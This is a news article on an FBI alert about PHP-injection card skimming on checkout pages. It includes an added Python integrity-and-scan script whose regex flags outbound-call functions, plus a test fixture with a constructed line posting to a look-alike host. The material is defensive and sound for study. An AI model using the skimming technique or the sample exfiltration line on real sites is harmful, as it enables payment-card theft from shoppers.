The U.S. Federal Bureau of Investigation has issued a flash alert warning businesses that cyber actors are scraping credit card data from online checkout pages.
The alert states that as of January, an unidentified cyber attacker had scraped credit card data from a business by injecting malicious PHP code into the business’ online checkout page. The attacker then sent the scraped data to a service that spoofed a legitimate card processing server.
Furthermore, it’s claimed that the attack also established backdoor access to the victim’s system by modifying two files within the checkout page.
This form of attack is hardly new – Magecart attacks have been prevalent for years, but as ZDNet points out, it appears that the methodology of inserting a different PHP function is a new variation on the typical attack. The actors create a backdoor using a debugging function and then install two webshells onto the service, giving additional room for exploitation.
The FBI recommends that businesses update and patch all systems, change default login credentials and monitor requests performed against e-commerce systems to identify possible malicious activity. It is also recommended that websites be secured with SSL and that third-party software and hardware only be installed from trusted sources.
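As an added illustration of the FBI's monitoring recommendation (example code written for this article, not from the alert, ZDNet or any named vendor), the script below baselines the checkout directory's file hashes, reports files modified or added since the baseline, and scans each changed PHP file for outbound calls to hosts other than the allowed payment processor; the allowed host, the look-alike host and the file names are constructed placeholders.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hosts the checkout code may legitimately post card data to (constructed for this example).
ALLOWED_PAYMENT_HOSTS = {"api.payments.example"}
# Crude indicators of skimmer-style PHP: an outbound-request helper next to a URL literal.
OUTBOUND_CALL = re.compile(r"\b(curl_init|curl_setopt|file_get_contents|fsockopen)\s*\(")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def hash_tree(root: Path) -> dict:
    """Map each file (path relative to root) to its SHA-256 digest: the integrity baseline."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def diff_baseline(baseline: dict, current: dict) -> dict:
    """Files that appeared, vanished or changed since the baseline was recorded."""
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "modified": sorted(f for f in baseline.keys() & current.keys()
                               if baseline[f] != current[f])}

def suspicious_hosts(php_source: str) -> set:
    """Hosts referenced in a file that also uses an outbound-call helper, minus allowed ones."""
    hosts = {h.lower() for h in URL_HOST.findall(php_source)} - ALLOWED_PAYMENT_HOSTS
    return hosts if OUTBOUND_CALL.search(php_source) else set()

def audit(root: Path, baseline: dict) -> dict:
    """Diff the tree against the baseline, then content-scan every new or changed PHP file."""
    changes = diff_baseline(baseline, hash_tree(root))
    flagged = {}
    for rel in changes["added"] + changes["modified"]:
        if rel.endswith(".php"):
            hosts = suspicious_hosts((root / rel).read_text(errors="replace"))
            if hosts:
                flagged[rel] = sorted(hosts)
    return {"changes": changes, "flagged": flagged}

def demo() -> dict:
    """Constructed scenario: baseline a clean checkout page, then tamper with the directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root, page = Path(tmp), Path(tmp) / "checkout.php"
        page.write_text('<?php $c = curl_init("https://api.payments.example/charge");\n')
        baseline = hash_tree(root)
        # Tampering: the page gains a second post to a look-alike host, and a new file appears.
        page.write_text(page.read_text() +
                        'curl_setopt($c, CURLOPT_URL, "https://api-payments.lookalike.test/c");\n')
        (root / "cache_debug.php").write_text("<?php // constructed stand-in for an unexpected file\n")
        return audit(root, baseline)
```

Run `demo()` to see the modified checkout page flagged for the look-alike host while the unexpected new file is reported as added; in production the baseline would be stored off-host and the audit scheduled.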
“This FBI warning is one that U.S. businesses should take very seriously,” Kunal Modasiya, senior director of product management at cybersecurity company PerimeterX Inc., told SiliconANGLE. “An attack whereby bad actors scraped online credit card data by injecting malicious PHP code into the checkout page is yet another way to steal customers’ personally identifiable information and payment data, abuse account information and commit fraud.”
Dave Cundiff, chief information security officer at managed security services company Cyvatar, noted that “continually verifying and monitoring an organization’s fundamental cybersecurity is a requirement these days.”
“If the fundamentals of an organization’s security are not strong, then the additional complexity of any additional security is useless,” Cundiff explained. “Almost all of the attacks or compromises we have been tracking over the last couple of years could have been prevented or at least had the impact greatly reduced by following the basic hygiene approach of fundamental security.”
“Patching systems, changing default passwords, reducing overlap in system communication, these principles of cybersecurity have been around for decades,” Cundiff added. “It is more and more critical to not get distracted by flashy sales pitches and focus on making sure your organization’s fundamental security is solid before moving to more advanced mitigations.”